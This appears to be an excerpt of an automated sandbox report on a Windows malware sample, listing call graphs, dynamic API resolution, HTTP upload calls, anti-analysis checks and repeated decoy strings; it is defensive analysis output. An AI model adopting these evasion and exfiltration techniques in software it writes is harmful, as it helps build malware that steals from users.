calls 38545->38546 38547 f33a0f 38546->38547 38548 f34610 2 API calls 38547->38548 38549 f33a28 38548->38549 38550 f34610 2 API calls 38549->38550 38551 f33a41 38550->38551 38552 f34610 2 API calls 38551->38552 38553 f33a5a 38552->38553 38554 f34610 2 API calls 38553->38554 38555 f33a73 38554->38555 38556 f34610 2 API calls 38555->38556 38557 f33a8c 38556->38557 38558 f34610 2 API calls 38557->38558 38559 f33aa5 38558->38559 38560 f34610 2 API calls 38559->38560 38561 f33abe 38560->38561 38562 f34610 2 API calls 38561->38562 38563 f33ad7 38562->38563 38564 f34610 2 API calls 38563->38564 38565 f33af0 38564->38565 38566 f34610 2 API calls 38565->38566 38567 f33b09 38566->38567 38568 f34610 2 API calls 38567->38568 38569 f33b22 38568->38569 38570 f34610 2 API calls 38569->38570 38571 f33b3b 38570->38571 38572 f34610 2 API calls 38571->38572 38573 f33b54 38572->38573 38574 f34610 2 API calls 38573->38574 38575 f33b6d 38574->38575 38576 f34610 2 API calls 38575->38576 38577 f33b86 38576->38577 38578 f34610 2 API calls 38577->38578 38579 f33b9f 38578->38579 38580 f34610 2 API calls 38579->38580 38581 f33bb8 38580->38581 38582 f34610 2 API calls 38581->38582 38583 f33bd1 38582->38583 38584 f34610 2 API calls 38583->38584 38585 f33bea 38584->38585 38586 f34610 2 API calls 38585->38586 38587 f33c03 38586->38587 38588 f34610 2 API calls 38587->38588 38589 f33c1c 38588->38589 38590 f34610 2 API calls 38589->38590 38591 f33c35 38590->38591 38592 f34610 2 API calls 38591->38592 38593 f33c4e 38592->38593 38594 f34610 2 API calls 38593->38594 38595 f33c67 38594->38595 38596 f34610 2 API calls 38595->38596 38597 f33c80 38596->38597 38598 f34610 2 API calls 38597->38598 38599 f33c99 38598->38599 38600 f34610 2 API calls 38599->38600 38601 f33cb2 38600->38601 38602 f34610 2 API calls 38601->38602 38603 f33ccb 38602->38603 38604 f34610 2 API calls 38603->38604 38605 f33ce4 38604->38605 38606 f34610 2 API calls 38605->38606 38607 f33cfd 38606->38607 38608 f34610 2 API calls 38607->38608 38609 f33d16 38608->38609 38610 f34610 2 API calls 38609->38610 38611 f33d2f 38610->38611 38612 f34610 2 API calls 38611->38612 38613 f33d48 38612->38613 38614 f34610 2 API calls 38613->38614 38615 f33d61 38614->38615 38616 f34610 2 API calls 38615->38616 38617 f33d7a 38616->38617 38618 f34610 2 API calls 38617->38618 38619 f33d93 38618->38619 38620 f34610 2 API calls 38619->38620 38621 f33dac 38620->38621 38622 f34610 2 API calls 38621->38622 38623 f33dc5 38622->38623 38624 f34610 2 API calls 38623->38624 38625 f33dde 38624->38625 38626 f34610 2 API calls 38625->38626 38627 f33df7 38626->38627 38628 f34610 2 API calls 38627->38628 38629 f33e10 38628->38629 38630 f34610 2 API calls 38629->38630 38631 f33e29 38630->38631 38632 f34610 2 API calls 38631->38632 38633 f33e42 38632->38633 38634 f34610 2 API calls 38633->38634 38635 f33e5b 38634->38635 38636 f34610 2 API calls 38635->38636 38637 f33e74 38636->38637 38638 f34610 2 API calls 38637->38638 38639 f33e8d 38638->38639 38640 f34610 2 API calls 38639->38640 38641 f33ea6 38640->38641 38642 f34610 2 API calls 38641->38642 38643 f33ebf 38642->38643 38644 f34610 2 API calls 38643->38644 38645 f33ed8 38644->38645 38646 f34610 2 API calls 38645->38646 38647 f33ef1 38646->38647 38648 f34610 2 API calls 38647->38648 38649 f33f0a 38648->38649 38650 f34610 2 API calls 38649->38650 38651 f33f23 38650->38651 38652 f34610 2 API calls 38651->38652 38653 f33f3c 38652->38653 38654 f34610 2 API calls 38653->38654 38655 f33f55 38654->38655 38656 f34610 2 API calls 38655->38656 38657 f33f6e 38656->38657 38658 f34610 2 API calls 38657->38658 38659 f33f87 38658->38659 38660 f34610 2 API calls 38659->38660 38661 f33fa0 38660->38661 38662 f34610 2 API calls 38661->38662 38663 f33fb9 38662->38663 38664 f34610 2 API calls 38663->38664 38665 f33fd2 38664->38665 38666 f34610 2 API calls 38665->38666 38667 f33feb 38666->38667 38668 f34610 2 API calls 38667->38668 38669 f34004 38668->38669 38670 f34610 2 API calls 38669->38670 38671 f3401d 38670->38671 38672 f34610 2 API calls 38671->38672 38673 f34036 38672->38673 38674 f34610 2 API calls 38673->38674 38675 f3404f 38674->38675 38676 f34610 2 API calls 38675->38676 38677 f34068 38676->38677 38678 f34610 2 API calls 38677->38678 38679 f34081 38678->38679 38680 f34610 2 API calls 38679->38680 38681 f3409a 38680->38681 38682 f34610 2 API calls 38681->38682 38683 f340b3 38682->38683 38684 f34610 2 API calls 38683->38684 38685 f340cc 38684->38685 38686 f34610 2 API calls 38685->38686 38687 f340e5 38686->38687 38688 f34610 2 API calls 38687->38688 38689 f340fe 38688->38689 38690 f34610 2 API calls 38689->38690 38691 f34117 38690->38691 38692 f34610 2 API calls 38691->38692 38693 f34130 38692->38693 38694 f34610 2 API calls 38693->38694 38695 f34149 38694->38695 38696 f34610 2 API calls 38695->38696 38697 f34162 38696->38697 38698 f34610 2 API calls 38697->38698 38699 f3417b 38698->38699 38700 f34610 2 API calls 38699->38700 38701 f34194 38700->38701 38702 f34610 2 API calls 38701->38702 38703 f341ad 38702->38703 38704 f34610 2 API calls 38703->38704 38705 f341c6 38704->38705 38706 f34610 2 API calls 38705->38706 38707 f341df 38706->38707 38708 f34610 2 API calls 38707->38708 38709 f341f8 38708->38709 38710 f34610 2 API calls 38709->38710 38711 f34211 38710->38711 38712 f34610 2 API calls 38711->38712 38713 f3422a 38712->38713 38714 f34610 2 API calls 38713->38714 38715 f34243 38714->38715 38716 f34610 2 API calls 38715->38716 38717 f3425c 38716->38717 38718 f34610 2 API calls 38717->38718 38719 f34275 38718->38719 38720 f34610 2 API calls 38719->38720 38721 f3428e 38720->38721 38722 f34610 2 API calls 38721->38722 38723 f342a7 38722->38723 38724 f34610 2 API calls 38723->38724 38725 f342c0 38724->38725 38726 f34610 2 API calls 38725->38726 38727 f342d9 38726->38727 38728 f34610 2 API calls 38727->38728 38729 f342f2 38728->38729 38730 f34610 2 API calls 38729->38730 38731 f3430b 38730->38731 38732 f34610 2 API calls 38731->38732 38733 f34324 38732->38733 38734 f34610 2 API calls 38733->38734 38735 f3433d 38734->38735 38736 f34610 2 API calls 38735->38736 38737 f34356 38736->38737 38738 f34610 2 API calls 38737->38738 38739 f3436f 38738->38739 38740 f34610 2 API calls 38739->38740 38741 f34388 38740->38741 38742 f34610 2 API calls 38741->38742 38743 f343a1 38742->38743 38744 f34610 2 API calls 38743->38744 38745 f343ba 38744->38745 38746 f34610 2 API calls 38745->38746 38747 f343d3 38746->38747 38748 f34610 2 API calls 38747->38748 38749 f343ec 38748->38749 38750 f34610 2 API calls 38749->38750 38751 f34405 38750->38751 38752 f34610 2 API calls 38751->38752 38753 f3441e 38752->38753 38754 f34610 2 API calls 38753->38754 38755 f34437 38754->38755 38756 f34610 2 API calls 38755->38756 38757 f34450 38756->38757 38758 f34610 2 API calls 38757->38758 38759 f34469 38758->38759 38760 f34610 2 API calls 38759->38760 38761 f34482 38760->38761 38762 f34610 2 API calls 38761->38762 38763 f3449b 38762->38763 38764 f34610 2 API calls 38763->38764 38765 f344b4 38764->38765 38766 f34610 2 API calls 38765->38766 38767 f344cd 38766->38767 38768 f34610 2 API calls 38767->38768 38769 f344e6 38768->38769 38770 f34610 2 API calls 38769->38770 38771 f344ff 38770->38771 38772 f34610 2 API calls 38771->38772 38773 f34518 38772->38773 38774 f34610 2 API calls 38773->38774 38775 f34531 38774->38775 38776 f34610 2 API calls 38775->38776 38777 f3454a 38776->38777 38778 f34610 2 API calls 38777->38778 38779 f34563 38778->38779 38780 f34610 2 API calls 38779->38780 38781 f3457c 38780->38781 38782 f34610 2 API calls 38781->38782 38783 f34595 38782->38783 38784 f34610 2 API calls 38783->38784 38785 f345ae 38784->38785 38786 f34610 2 API calls 38785->38786 38787 f345c7 38786->38787 38788 f34610 2 API calls 38787->38788 38789 f345e0 38788->38789 38790 f34610 2 API calls 38789->38790 38791 f345f9 38790->38791 38792 f49f20 38791->38792 38793 f4a346 8 API calls 38792->38793 38794 f49f30 43 API calls 38792->38794 38795 f4a456 38793->38795 38796 f4a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38793->38796 38794->38793 38797 f4a526 38795->38797 38798 f4a463 8 API calls 38795->38798 38796->38795 38799 f4a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38797->38799 38800 f4a5a8 38797->38800 38798->38797 38799->38800 38801 f4a5b5 6 API calls 38800->38801 38802 f4a647 38800->38802 38801->38802 38803 f4a654 9 API calls 38802->38803 38804 f4a72f 38802->38804 38803->38804 38805 f4a7b2 38804->38805 38806 f4a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38804->38806 38807 f4a7ec 38805->38807 38808 f4a7bb GetProcAddress GetProcAddress 38805->38808 38806->38805 38809 f4a825 38807->38809 38810 f4a7f5 GetProcAddress GetProcAddress 38807->38810 38808->38807 38811 f4a922 38809->38811 38812 f4a832 10 API calls 38809->38812 38810->38809 38813 f4a98d 38811->38813 38814 f4a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38811->38814 38812->38811 38815 f4a996 GetProcAddress 38813->38815 38816 f4a9ae 38813->38816 38814->38813 38815->38816 38817 f4a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38816->38817 38818 f45ef3 38816->38818 38817->38818 38819 f31590 38818->38819 39089 f316b0 38819->39089 38822 f4aab0 lstrcpy 38823 f315b5 38822->38823 38824 f4aab0 lstrcpy 38823->38824 38825 f315c7 38824->38825 38826 f4aab0 lstrcpy 38825->38826 38827 f315d9 38826->38827 38828 f4aab0 lstrcpy 38827->38828 38829 f31663 38828->38829 38830 f45760 38829->38830 38831 f45771 38830->38831 38832 f4ab30 2 API calls 38831->38832 38833 f4577e 38832->38833 38834 f4ab30 2 API calls 38833->38834 38835 f4578b 38834->38835 38836 f4ab30 2 API calls 38835->38836 38837 f45798 38836->38837 38838 f4aa50 lstrcpy 38837->38838 38839 f457a5 38838->38839 38840 f4aa50 lstrcpy 38839->38840 38841 f457b2 38840->38841 38842 f4aa50 lstrcpy 38841->38842 38843 f457bf 38842->38843 38844 f4aa50 lstrcpy 38843->38844 38876 f457cc 38844->38876 38845 f4aa50 lstrcpy 38845->38876 38846 f4ab30 lstrlen lstrcpy 38846->38876 38847 f45893 StrCmpCA 38847->38876 38848 f458f0 StrCmpCA 38849 f45a2c 38848->38849 38848->38876 38850 f4abb0 lstrcpy 38849->38850 38851 f45a38 38850->38851 38852 f4ab30 2 API calls 38851->38852 38855 f45a46 38852->38855 38853 f45aa6 StrCmpCA 38857 f45be1 38853->38857 38853->38876 38854 f45440 20 API calls 38854->38876 38856 f4ab30 2 API calls 38855->38856 38858 f45a55 38856->38858 38859 f4abb0 lstrcpy 38857->38859 38860 f316b0 lstrcpy 38858->38860 38861 f45bed 38859->38861 38882 f45a61 38860->38882 38862 f4ab30 2 API calls 38861->38862 38863 f45bfb 38862->38863 38866 f4ab30 2 API calls 38863->38866 38864 f45c5b StrCmpCA 38867 f45c66 Sleep 38864->38867 38868 f45c78 38864->38868 38865 f45510 25 API calls 38865->38876 38869 f45c0a 38866->38869 38867->38876 38870 f4abb0 lstrcpy 38868->38870 38871 f316b0 lstrcpy 38869->38871 38872 f45c84 38870->38872 38871->38882 38873 f4ab30 2 API calls 38872->38873 38874 f45c93 38873->38874 38875 f4ab30 2 API calls 38874->38875 38877 f45ca2 38875->38877 38876->38845 38876->38846 38876->38847 38876->38848 38876->38853 38876->38854 38876->38864 38876->38865 38878 f459da StrCmpCA 38876->38878 38880 f4aab0 lstrcpy 38876->38880 38881 f45b8f StrCmpCA 38876->38881 38883 f4abb0 lstrcpy 38876->38883 38884 f31590 lstrcpy 38876->38884 38879 f316b0 lstrcpy 38877->38879 38878->38876 38879->38882 38880->38876 38881->38876 38882->37937 38883->38876 38884->38876 38886 f476e3 GetVolumeInformationA 38885->38886 38887 f476dc 38885->38887 38888 f47721 38886->38888 38887->38886 38889 f4778c GetProcessHeap RtlAllocateHeap 38888->38889 38890 f477b8 wsprintfA 38889->38890 38891 f477a9 38889->38891 38892 f4aa50 lstrcpy 38890->38892 38893 f4aa50 lstrcpy 38891->38893 38894 f45ff7 38892->38894 38893->38894 38894->37958 38896 f4aab0 lstrcpy 38895->38896 38897 f348e9 38896->38897 39098 f34800 38897->39098 38899 f348f5 38900 f4aa50 lstrcpy 38899->38900 38901 f34927 38900->38901 38902 f4aa50 lstrcpy 38901->38902 38903 f34934 38902->38903 38904 f4aa50 lstrcpy 38903->38904 38905 f34941 38904->38905 38906 f4aa50 lstrcpy 38905->38906 38907 f3494e 38906->38907 38908 f4aa50 lstrcpy 38907->38908 38909 f3495b InternetOpenA StrCmpCA 38908->38909 38910 f34994 38909->38910 38911 f34f1b InternetCloseHandle 38910->38911 39104 f48cf0 38910->39104 38913 f34f38 38911->38913 39119 f3a210 CryptStringToBinaryA 38913->39119 38914 f349b3 39112 f4ac30 38914->39112 38917 f349c6 38919 f4abb0 lstrcpy 38917->38919 38924 f349cf 38919->38924 38920 f4ab30 2 API calls 38921 f34f55 38920->38921 38923 f4acc0 4 API calls 38921->38923 38922 f34f77 ctype 38926 f4aab0 lstrcpy 38922->38926 38925 f34f6b 38923->38925 38928 f4acc0 4 API calls 38924->38928 38927 f4abb0 lstrcpy 38925->38927 38939 f34fa7 38926->38939 38927->38922 38929 f349f9 38928->38929 38930 f4abb0 lstrcpy 38929->38930 38931 f34a02 38930->38931 38932 f4acc0 4 API calls 38931->38932 38933 f34a21 38932->38933 38934 f4abb0 lstrcpy 38933->38934 38935 f34a2a 38934->38935 38936 f4ac30 3 API calls 38935->38936 38937 f34a48 38936->38937 38938 f4abb0 lstrcpy 38937->38938 38940 f34a51 38938->38940 38939->37961 38941 f4acc0 4 API calls 38940->38941 38942 f34a70 38941->38942 38943 f4abb0 lstrcpy 38942->38943 38944 f34a79 38943->38944 38945 f4acc0 4 API calls 38944->38945 38946 f34a98 38945->38946 38947 f4abb0 lstrcpy 38946->38947 38948 f34aa1 38947->38948 38949 f4acc0 4 API calls 38948->38949 38950 f34acd 38949->38950 38951 f4ac30 3 API calls 38950->38951 38952 f34ad4 38951->38952 38953 f4abb0 lstrcpy 38952->38953 38954 f34add 38953->38954 38955 f34af3 InternetConnectA 38954->38955 38955->38911 38956 f34b23 HttpOpenRequestA 38955->38956 38958 f34b78 38956->38958 38959 f34f0e InternetCloseHandle 38956->38959 38960 f4acc0 4 API calls 38958->38960 38959->38911 38961 f34b8c 38960->38961 38962 f4abb0 lstrcpy 38961->38962 38963 f34b95 38962->38963 38964 f4ac30 3 API calls 38963->38964 38965 f34bb3 38964->38965 38966 f4abb0 lstrcpy 38965->38966 38967 f34bbc 38966->38967 38968 f4acc0 4 API calls 38967->38968 38969 f34bdb 38968->38969 38970 f4abb0 lstrcpy 38969->38970 38971 f34be4 38970->38971 38972 f4acc0 4 API calls 38971->38972 38973 f34c05 38972->38973 38974 f4abb0 lstrcpy 38973->38974 38975 f34c0e 38974->38975 38976 f4acc0 4 API calls 38975->38976 38977 f34c2e 38976->38977 38978 f4abb0 lstrcpy 38977->38978 38979 f34c37 38978->38979 38980 f4acc0 4 API calls 38979->38980 38981 f34c56 38980->38981 38982 f4abb0 lstrcpy 38981->38982 38983 f34c5f 38982->38983 38984 f4ac30 3 API calls 38983->38984 38985 f34c7d 38984->38985 38986 f4abb0 lstrcpy 38985->38986 38987 f34c86 38986->38987 38988 f4acc0 4 API calls 38987->38988 38989 f34ca5 38988->38989 38990 f4abb0 lstrcpy 38989->38990 38991 f34cae 38990->38991 38992 f4acc0 4 API calls 38991->38992 38993 f34ccd 38992->38993 38994 f4abb0 lstrcpy 38993->38994 38995 f34cd6 38994->38995 38996 f4ac30 3 API calls 38995->38996 38997 f34cf4 38996->38997 38998 f4abb0 lstrcpy 38997->38998 38999 f34cfd 38998->38999 39000 f4acc0 4 API calls 38999->39000 39001 f34d1c 39000->39001 39002 f4abb0 lstrcpy 39001->39002 39003 f34d25 39002->39003 39004 f4acc0 4 API calls 39003->39004 39005 f34d46 39004->39005 39006 f4abb0 lstrcpy 39005->39006 39007 f34d4f 39006->39007 39008 f4acc0 4 API calls 39007->39008 39009 f34d6f 39008->39009 39010 f4abb0 lstrcpy 39009->39010 39011 f34d78 39010->39011 39012 f4acc0 4 API calls 39011->39012 39013 f34d97 39012->39013 39014 f4abb0 lstrcpy 39013->39014 39015 f34da0 39014->39015 39016 f4ac30 3 API calls 39015->39016 39017 f34dbe 39016->39017 39018 f4abb0 lstrcpy 39017->39018 39019 f34dc7 39018->39019 39020 f4aa50 lstrcpy 39019->39020 39021 f34de2 39020->39021 39022 f4ac30 3 API calls 39021->39022 39023 f34e03 39022->39023 39024 f4ac30 3 API calls 39023->39024 39025 f34e0a 39024->39025 39026 f4abb0 lstrcpy 39025->39026 39027 f34e16 39026->39027 39028 f34e37 lstrlen 39027->39028 39029 f34e4a 39028->39029 39030 f34e53 lstrlen 39029->39030 39118 f4ade0 39030->39118 39032 f34e63 HttpSendRequestA 39033 f34e82 InternetReadFile 39032->39033 39034 f34eb7 InternetCloseHandle 39033->39034 39039 f34eae 39033->39039 39036 f4ab10 39034->39036 39036->38959 39037 f4acc0 4 API calls 39037->39039 39038 f4abb0 lstrcpy 39038->39039 39039->39033 39039->39034 39039->39037 39039->39038 39125 f4ade0 39040->39125 39042 f41a14 StrCmpCA 39043 f41a1f ExitProcess 39042->39043 39055 f41a27 39042->39055 39044 f41c12 39044->37963 39045 f41afd StrCmpCA 39045->39055 39046 f41b1f StrCmpCA 39046->39055 39047 f41bc0 StrCmpCA 39047->39055 39048 f41b41 StrCmpCA 39048->39055 39049 f41ba1 StrCmpCA 39049->39055 39050 f41b82 StrCmpCA 39050->39055 39051 f41b63 StrCmpCA 39051->39055 39052 f41aad StrCmpCA 39052->39055 39053 f41acf StrCmpCA 39053->39055 39054 f4ab30 lstrlen lstrcpy 39054->39055 39055->39044 39055->39045 39055->39046 39055->39047 39055->39048 39055->39049 39055->39050 39055->39051 39055->39052 39055->39053 39055->39054 39056->37969 39057->37971 39058->37977 39059->37979 39060->37985 39061->37987 39062->37991 39063->37995 39064->37999 39065->38005 39066->38007 39067->38011 39068->38025 39069->38029 39070->38028 39071->38024 39072->38028 39073->38042 39074->38062 39075->38045 39076->38054 39077->38058 39078->38047 39079->38046 39080->38050 39081->38059 39082->38082 39083->38086 39084->38085 39085->38081 39086->38085 39087->38095 39090 f4aab0 lstrcpy 39089->39090 39091 f316c3 39090->39091 39092 f4aab0 lstrcpy 39091->39092 39093 f316d5 39092->39093 39094 f4aab0 lstrcpy 39093->39094 39095 f316e7 39094->39095 39096 f4aab0 lstrcpy 39095->39096 39097 f315a3 39096->39097 39097->38822 39099 f34816 39098->39099 39100 f34888 lstrlen 39099->39100 39124 f4ade0 39100->39124 39102 f34898 InternetCrackUrlA 39103 f348b7 39102->39103 39103->38899 39105 f4aa50 lstrcpy 39104->39105 39106 f48d04 39105->39106 39107 f4aa50 lstrcpy 39106->39107 39108 f48d12 GetSystemTime 39107->39108 39110 f48d29 39108->39110 39109 f4aab0 lstrcpy 39111 f48d8c 39109->39111 39110->39109 39111->38914 39113 f4ac41 39112->39113 39114 f4ac98 39113->39114 39116 f4ac78 lstrcpy lstrcat 39113->39116 39115 f4aab0 lstrcpy 39114->39115 39117 f4aca4 39115->39117 39116->39114 39117->38917 39118->39032 39120 f34f3e 39119->39120 39121 f3a249 LocalAlloc 39119->39121 39120->38920 39120->38922 39121->39120 39122 f3a264 CryptStringToBinaryA 39121->39122 39122->39120 39123 f3a289 LocalFree 39122->39123 39123->39120 39124->39102 39125->39042

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 660 f49bb0-f49bc4 call f49aa0 663 f49de3-f49e42 LoadLibraryA * 5 660->663 664 f49bca-f49dde call f49ad0 GetProcAddress * 21 660->664 666 f49e44-f49e58 GetProcAddress 663->666 667 f49e5d-f49e64 663->667 664->663 666->667 668 f49e96-f49e9d 667->668 669 f49e66-f49e91 GetProcAddress * 2 667->669 671 f49e9f-f49eb3 GetProcAddress 668->671 672 f49eb8-f49ebf 668->672 669->668 671->672 673 f49ec1-f49ed4 GetProcAddress 672->673 674 f49ed9-f49ee0 672->674 673->674 675 f49f11-f49f12 674->675 676 f49ee2-f49f0c GetProcAddress * 2 674->676 676->675
                            APIs
                            • GetProcAddress.KERNEL32(75900000,00980648), ref: 00F49BF1
                            • GetProcAddress.KERNEL32(75900000,009807F8), ref: 00F49C0A
                            • GetProcAddress.KERNEL32(75900000,009806D8), ref: 00F49C22
                            • GetProcAddress.KERNEL32(75900000,009806F0), ref: 00F49C3A
                            • GetProcAddress.KERNEL32(75900000,00980708), ref: 00F49C53
                            • GetProcAddress.KERNEL32(75900000,00988AF0), ref: 00F49C6B
                            • GetProcAddress.KERNEL32(75900000,00976700), ref: 00F49C83
                            • GetProcAddress.KERNEL32(75900000,00976A20), ref: 00F49C9C
                            • GetProcAddress.KERNEL32(75900000,00980738), ref: 00F49CB4
                            • GetProcAddress.KERNEL32(75900000,00980750), ref: 00F49CCC
                            • GetProcAddress.KERNEL32(75900000,00980768), ref: 00F49CE5
                            • GetProcAddress.KERNEL32(75900000,009807B0), ref: 00F49CFD
                            • GetProcAddress.KERNEL32(75900000,009766A0), ref: 00F49D15
                            • GetProcAddress.KERNEL32(75900000,00980780), ref: 00F49D2E
                            • GetProcAddress.KERNEL32(75900000,009807C8), ref: 00F49D46
                            • GetProcAddress.KERNEL32(75900000,00976800), ref: 00F49D5E
                            • GetProcAddress.KERNEL32(75900000,009807E0), ref: 00F49D77
                            • GetProcAddress.KERNEL32(75900000,009808B8), ref: 00F49D8F
                            • GetProcAddress.KERNEL32(75900000,00976840), ref: 00F49DA7
                            • GetProcAddress.KERNEL32(75900000,00980858), ref: 00F49DC0
                            • GetProcAddress.KERNEL32(75900000,009769C0), ref: 00F49DD8
                            • LoadLibraryA.KERNEL32(00980870,?,00F46CA0), ref: 00F49DEA
                            • LoadLibraryA.KERNEL32(00980900,?,00F46CA0), ref: 00F49DFB
                            • LoadLibraryA.KERNEL32(00980888,?,00F46CA0), ref: 00F49E0D
                            • LoadLibraryA.KERNEL32(009808A0,?,00F46CA0), ref: 00F49E1F
                            • LoadLibraryA.KERNEL32(009808D0,?,00F46CA0), ref: 00F49E30
                            • GetProcAddress.KERNEL32(75070000,009808E8), ref: 00F49E52
                            • GetProcAddress.KERNEL32(75FD0000,00980918), ref: 00F49E73
                            • GetProcAddress.KERNEL32(75FD0000,00988C40), ref: 00F49E8B
                            • GetProcAddress.KERNEL32(75A50000,00988E50), ref: 00F49EAD
                            • GetProcAddress.KERNEL32(74E50000,00976740), ref: 00F49ECE
                            • GetProcAddress.KERNEL32(76E80000,00988A10), ref: 00F49EEF
                            • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00F49F06
                            Strings
                            • NtQueryInformationProcess, xrefs: 00F49EFA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: a018fe7c8dc0800087565df1433bc287b91a1c28dc23732d37ccd0aa4d7743cc
                            • Instruction ID: 8869300c51c8ee5000026e5253f20a311bb247801708e252a466b6ee00de775b
                            • Opcode Fuzzy Hash: a018fe7c8dc0800087565df1433bc287b91a1c28dc23732d37ccd0aa4d7743cc
                            • Instruction Fuzzy Hash: 64A12EB56042009FC366DFA8F88C956BBBAB74D701710871AB989C329ED774B950DFB0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 764 f34610-f346e5 RtlAllocateHeap 781 f346f0-f346f6 764->781 782 f3479f-f347f9 VirtualProtect 781->782 783 f346fc-f3479a 781->783 783->781
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F3465F
                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00F347EC
                            Strings
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F347C0
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F34638
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F346FC
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F34712
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F34688
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F34707
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F3478F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F34672
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F346B2
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F34728
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F346D3
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F347B5
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F346BD
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F34779
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F3476E
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F347CB
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F34693
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F346C8
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F34617
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F34622
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F34643
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F346A7
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F34763
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F34784
